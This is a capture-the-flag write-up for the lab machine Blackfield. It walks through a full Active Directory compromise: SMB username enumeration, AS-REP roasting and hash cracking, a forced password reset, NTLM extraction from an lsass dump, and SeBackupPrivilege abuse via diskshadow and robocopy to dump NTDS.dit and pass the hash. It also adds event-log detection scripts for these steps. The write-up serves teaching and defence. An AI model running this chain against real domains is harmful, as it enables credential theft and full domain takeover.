Blackfield
Overview
Blackfield is a hard Windows box built around a three-hop Active Directory chain. The profiles$ SMB share leaks a large username list with no credentials needed. AS-REP roasting finds the support account has pre-authentication disabled, and rockyou.txt cracks its hash. BloodHound maps a ForceChangePassword right from support to audit2020, which grants access to the forensic share. That share holds a memory dump of lsass.exe; parsing it with pypykatz recovers svc_backup’s NTLM hash. svc_backup has WinRM access and belongs to the Backup Operators group, which grants SeBackupPrivilege; that privilege is used with a diskshadow script to create a VSS snapshot, robocopy NTDS.dit out of it, and dump every domain hash.
Path: anonymous SMB → username enumeration → AS-REP roast support → ForceChangePassword → audit2020 → forensic share → lsass.dmp → svc_backup NTLM → SeBackupPrivilege → VSS → NTDS.dit → Administrator hash.
Enumeration
$ nmap 10.10.10.192 -Pn -p- -A
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local)
5985/tcp open http Microsoft HTTPAPI httpd 2.0

Domain: BLACKFIELD.local, hostname DC01. WinRM on 5985 means that any account with Remote Management access will land a shell. The clock skew from the scan output is a reminder to sync time before Kerberos operations.
SMB shares
$ smbclient -L //blackfield.local
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
profiles$ is accessible anonymously. It contains hundreds of empty user directories — a clean username list. Parsing the share output to extract the first column gives users.txt.
$ smbclient //blackfield.local/profiles$ -N -c "ls" | awk '{print $1}' > users.txt
Foothold — AS-REP Roasting
With a large username list, checking for accounts with pre-authentication disabled is a quick win:
$ GetNPUsers.py -usersfile users.txt blackfield.local/ -dc-ip 10.10.10.192 \
-format hashcat -outputfile hashes.txt
After fixing the clock skew with rdate, the command returns a roastable hash for support. Cracking against rockyou.txt:
$ hashcat -m 18200 -a 0 hashes.txt /tools/SecLists/Passwords/Leaked-Databases/rockyou.txt

The support account’s password is recovered.
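From the defender's side, the roast above leaves a distinct trace on the DC. The following is an added example (not from the original writeup) that flags it in Security event 4768 records; the field names are those of the 4768 event XML, while the sample records, the legacy_app account and the requesting IP 10.10.14.5 are constructed:

```python
"""AS-REP roasting detection over Windows Security event 4768 records.
Added example, not from the original writeup. A successful 4768 (TGT requested)
with Pre-Authentication Type 0 means the KDC issued a TGT to an account with
pre-auth disabled, which is what GetNPUsers.py triggers. Field names follow the
4768 event XML; the sample records and the requesting IP are constructed."""
from collections import defaultdict

RC4_HMAC = "0x17"   # Ticket Encryption Type value for RC4, the cheap-to-crack case

def classify_4768(ev):
    """Return a severity for one 4768 record, or None if it is not a roast."""
    if ev.get("Status") != "0x0":       # only successful TGT requests matter
        return None
    if ev.get("PreAuthType") != "0":    # 0 = logon without pre-authentication
        return None
    if ev.get("TicketEncryptionType") == RC4_HMAC:
        return "high"                   # no pre-auth and RC4: hashcat 18200 territory
    return "medium"                     # no pre-auth but AES: still roastable, slower

def roast_report(events):
    """Group flagged records by requesting IP: {ip: [(account, severity), ...]}."""
    report = defaultdict(list)
    for ev in events:
        sev = classify_4768(ev)
        if sev:
            report[ev["IpAddress"]].append((ev["TargetUserName"].lower(), sev))
    return dict(report)

# Constructed sample: the support record mirrors the roast described above;
# legacy_app is a made-up account, DC01$ is normal pre-authenticated traffic.
SAMPLE_4768 = [
    {"TargetUserName": "support", "IpAddress": "10.10.14.5",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TargetUserName": "legacy_app", "IpAddress": "10.10.14.5",
     "PreAuthType": "0", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"TargetUserName": "DC01$", "IpAddress": "10.10.10.192",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"TargetUserName": "nobody", "IpAddress": "10.10.14.5",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x6"},
]

if __name__ == "__main__":
    for ip, hits in roast_report(SAMPLE_4768).items():
        for account, sev in hits:
            print(f"{sev:6} AS-REP roast candidate: {account} requested from {ip}")
```

The same check is trivial to port to a SIEM query: EventID 4768, PreAuthType 0, Status 0x0, with TicketEncryptionType 0x17 as the high-severity variant.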
Lateral Movement — ForceChangePassword to audit2020
With support credentials, BloodHound can be collected to map AD rights:
$ python3 bloodhound.py -u support -d BLACKFIELD.local -c All --zip -ns 10.10.10.192
Querying shortest paths from owned principals in BloodHound reveals that support has ForceChangePassword on audit2020:

Changing audit2020’s password from Linux:
$ net rpc password "audit2020" "newP@ssword2022" \
-U "BLACKFIELD"/"support"%"#00^BlackKnight" -S "BLACKFIELD.local"
Verifying access to the forensic share:
$ smbclient -U "audit2020" //BLACKFIELD.local/forensic
The share contains three directories — commands_output, memory_analysis, and tools. Inside memory_analysis is lsass.zip, which holds lsass.dmp.
User — lsass Dump → svc_backup Hash
Parsing the dump with pypykatz (or mimikatz) to extract cached credentials recovers svc_backup’s NTLM hash:

$ evil-winrm -u "svc_backup" -H <svc_backup_hash> -i blackfield.local
Checking privileges:
*Evil-WinRM* PS> whoami /all
The account is a member of Backup Operators and holds SeBackupPrivilege — the right to read any file on the filesystem, bypassing ACLs.
Privilege Escalation — SeBackupPrivilege via Diskshadow
SeBackupPrivilege can be weaponized with diskshadow to create a VSS snapshot of C:, from which robocopy in backup mode (/b, which honours backup semantics) can copy the otherwise locked NTDS.dit; the SYSTEM hive, needed to decrypt it, is saved directly from the live registry with reg save.
A diskshadow script handles the VSS side:
set verbose ON
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup
exit
*Evil-WinRM* PS> upload commands.dsh
*Evil-WinRM* PS> diskshadow /s commands.dsh


Then save the SYSTEM hive from the live registry and copy NTDS.dit out of the exposed snapshot:
*Evil-WinRM* PS> reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM.SAV
*Evil-WinRM* PS> robocopy E:\Windows\NTDS C:\Windows\Temp\ntds ntds.dit /b
Download both files and run secretsdump locally:
$ impacket-secretsdump -ntds ntds.dit -system SYSTEM.SAV LOCAL


With the Administrator hash, pass-the-hash into the box:
$ evil-winrm -u Administrator -H <admin_hash> -i blackfield.local
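The chain above is noisy once process-creation auditing with command-line logging is enabled on the DC. The following is an added example (not from the original writeup) that correlates the three 4688 process-creation records the chain produces per logon session; field names follow the 4688 event XML, and the sample records, logon ids and the backupadmin account are constructed:

```python
"""Detect the diskshadow / reg save / robocopy NTDS chain in 4688 records.
Added example, not from the original writeup; needs process-creation auditing
with command-line logging on the DC. Sample records and logon ids are constructed."""
import re
from collections import defaultdict

def stage_of(cmdline):
    """Map one 4688 command line to a stage of the chain, or None."""
    c = cmdline.lower().replace('"', "")
    exe = (c.split() or [""])[0].rsplit("\\", 1)[-1]   # strip any leading path
    if exe in ("diskshadow", "diskshadow.exe") and re.search(r"\s/s\b", c):
        return "vss_script"                              # scripted VSS snapshot
    if exe in ("reg", "reg.exe") and " save " in c and "hklm\\system" in c:
        return "system_hive"                             # boot key for secretsdump
    if exe in ("robocopy", "robocopy.exe") and "ntds" in c and re.search(r"\s/b\b", c):
        return "ntds_copy"                               # backup-mode copy of NTDS
    return None

def chain_alerts(events, min_stages=2):
    """Correlate stages per SubjectLogonId; return {logon_id: (user, stages)}
    for sessions that reached at least min_stages distinct stages."""
    sessions = defaultdict(lambda: ["", set()])
    for ev in events:
        stage = stage_of(ev.get("CommandLine", ""))
        if stage:
            entry = sessions[ev["SubjectLogonId"]]
            entry[0] = ev["SubjectUserName"]
            entry[1].add(stage)
    return {lid: (user, frozenset(stages))
            for lid, (user, stages) in sessions.items() if len(stages) >= min_stages}

# Constructed sample: the svc_backup session mirrors the commands shown above;
# the backupadmin session is ordinary admin activity that must not alert.
SAMPLE_4688 = [
    {"SubjectUserName": "svc_backup", "SubjectLogonId": "0x3e7a1",
     "CommandLine": '"C:\\Windows\\system32\\diskshadow.exe" /s commands.dsh'},
    {"SubjectUserName": "svc_backup", "SubjectLogonId": "0x3e7a1",
     "CommandLine": "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\SYSTEM.SAV"},
    {"SubjectUserName": "svc_backup", "SubjectLogonId": "0x3e7a1",
     "CommandLine": "robocopy E:\\Windows\\NTDS C:\\Windows\\Temp\\ntds ntds.dit /b"},
    {"SubjectUserName": "backupadmin", "SubjectLogonId": "0x5c210",
     "CommandLine": "robocopy D:\\Shares E:\\Backup /mir /r:1"},
    {"SubjectUserName": "backupadmin", "SubjectLogonId": "0x5c210",
     "CommandLine": "diskshadow.exe"},                  # interactive, no script
]

if __name__ == "__main__":
    for lid, (user, stages) in chain_alerts(SAMPLE_4688).items():
        print(f"ALERT logon {lid} ({user}): {', '.join(sorted(stages))}")
```

Any single stage can be legitimate backup administration; two or more under one logon id, from an account that is not a known backup operator workstation, is the pattern worth paging on.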
Takeaways
- Large anonymous profile shares are a gold mine for username enumeration — even empty home directories establish a valid user list that feeds AS-REP roasting.
- SeBackupPrivilege is a full domain compromise primitive. A Backup Operators member can create a VSS snapshot and robocopy NTDS.dit with no additional rights required; the diskshadow-scripted approach avoids interactive limitations and works reliably over WinRM.